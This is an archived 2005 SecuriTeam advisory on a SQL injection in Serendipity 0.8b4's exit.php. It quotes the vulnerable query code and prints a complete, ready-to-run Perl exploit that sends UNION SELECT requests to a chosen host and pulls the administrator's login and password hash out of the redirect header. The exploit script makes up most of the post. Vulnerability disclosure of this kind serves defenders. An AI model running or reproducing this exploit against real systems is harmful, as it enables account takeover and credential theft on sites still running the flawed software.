[EXPL] Serendipity exit.php SQL Injection (Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 04/17/05

  • Next message: SecuriTeam: "[NEWS] JavaMail Directory Traversal Vulnerability" 
    To: list@securiteam.com
Date: 17 Apr 2005 17:15:01 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Serendipity exit.php SQL Injection (Exploit)
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.s9y.org/> Serendipity is a weblog/blog system, implemented
    with PHP. It is standards compliant, feature rich and open source (BSD
    License)". The following exploit reveals login and password hash stored by
    the Serendipity system.

    DETAILS

    Vulnerable Systems:
     * Serendipity version 0.8b4.

    Its possible to inject malicious SQL code into $_GET['url_id'] and
    $_GET['entry_id'] fields. Sending such maliciously crafted request may
    reveal an account login/passwd hash.

    Vulnerable Code:
    $links = serendipity_db_query("SELECT link FROM
    {$serendipity['dbPrefix']}references WHERE id = {$_GET['url_id']} AND
    entry_id = {$_GET['entry_id']}", true);
    //.......
    // no checks here...
    //.......
    if (is_array($links) && isset($links['link'])) {
    // URL is valid. Track it.
    $url = $links['link'];
    }
    //......
    if (serendipity_isResponseClean($url)) {
    header('HTTP/1.0 301 Moved Permanently');
    header('Location: ' . $url);
    }

    Exploit:
    #!/usr/bin/perl
    # Serendipity 0.8beta4 exit.php SQL Injection exploit
    # (c) ADZ Security Team 2004-2005
    # (c) kreon 2005
    # http://adz.void.ru/
    # kre0n@mail.ru
    # Public :)

    print "\n\n";
    print "# Serendipity 0.8beta4 exit.php SQL Injection exploit\n";
    print "# (C) ADZ Security Team 2004-2005\n";
    print "# (C) kreon 2005\n";

    use IO::Socket;
    use Getopt::Std;

    getopt("h:d:p:t:");

    $opt_p ||= 80;
    $opt_d ||= "/";
    $opt_t ||= "serendipity_";

    if(!$opt_h) {
        die("# Usage: $0 -h <host> [-d <dir>] [-p <port>] [-t
    table_prefix]\n");
    }

    $sqlpass = "?entry_id=1&url_id=1%20UNION%20SELECT%20password
       %20FROM%20".$opt_t."authors%20WHERE%20userlevel=255/*";
    $sqllogin = "?entry_id=1&url_id=1%20UNION%20SELECT%20username
       %20FROM%20".$opt_t."authors%20WHERE%20userlevel=255/*";

    print "# Host: $opt_h\n";
    print "# Dir: $opt_d\n";
    print "# Port: $opt_p\n";
    print "# Prefix: $opt_t\n";

    $Q1 = "GET ".$opt_d."/exit.php".$sqllogin." HTTP/1.0\n";
    $Q1 .= "Host: ".$opt_h."\n\n";

    $Q2 = "GET ".$opt_d."/exit.php".$sqlpass." HTTP/1.0\n";
    $Q2 .= "Host: ".$opt_h."\n\n";

    $s = IO::Socket::INET->new(Proto => 'tcp', PeerAddr => $opt_h, PeerPort =>
    $opt_p) or die("Can't connect!");
    $s->send($Q1);
    $s->recv($txt, 1024);
    if($txt =~ m/location: (\S+)/i) {
        $login = $1;
    }

    $s = IO::Socket::INET->new(Proto=>'tcp', PeerAddr => $opt_h, PeerPort =>
    $opt_p) or die("Can't connect!");
    $s->send($Q2);
    $s->recv($txt, 1024);
    if($txt =~ m/location: (\S+)/i) {
        $pass = $1;
    }
    if(!$login || !$pass || $login =~ m/http:\/\//i || $pass =~ m/http:\/\//i)
    {
        print "# Failed :(\n";
        exit;
    }

    print "# Succeed :)\n";
    print "# Login: $login\n";
    print "# Pass Hash: $pass\n";
    print "\n";

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:kre0n@mail.ru> kreon.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NEWS] JavaMail Directory Traversal Vulnerability"

    Relevant Pages

    • Re: Password hashes
      ... There are only LM and NTLM hashes. ... There is an NTLMv2 hash but it is not stored. ... authenticating to the network. ... Auditing and reviewing the security logs ...
      (microsoft.public.windowsxp.security_admin)
    • Re: Password hashes
      ... NTLM hash as the key. ... There is however no locally stored NTLMV2 hash of passwords. ... Auditing and reviewing the security logs ... secure their network and data and the documentation to do such at TechNet ...
      (microsoft.public.windowsxp.security_admin)
    • Re: Crack in Computer Security Code Raises Red Flag
      ... > Crack in Computer Security Code Raises Red Flag ... Hash functions are at work, for instance, for most of the ... the uniqueness of the hash is what makes ... > Also worrying cryptographers is a stream of recent hash compromises. ...
      (alt.computer.security)
    • Re: Slow but secure has function for small data
      ... but now again you base the security upon a classic hash ... final value is unknown because the passphrase is assumed to contain entropy. ... The only positive proof you're goig to get with a DLP based system is ...
      (sci.crypt)
    • Re: Crack in Computer Security Code Raises Red Flag
      ... > Crack in Computer Security Code Raises Red Flag ... Hash functions are at work, for instance, for most of the ... the uniqueness of the hash is what makes ... > Also worrying cryptographers is a stream of recent hash compromises. ...
      (sci.crypt)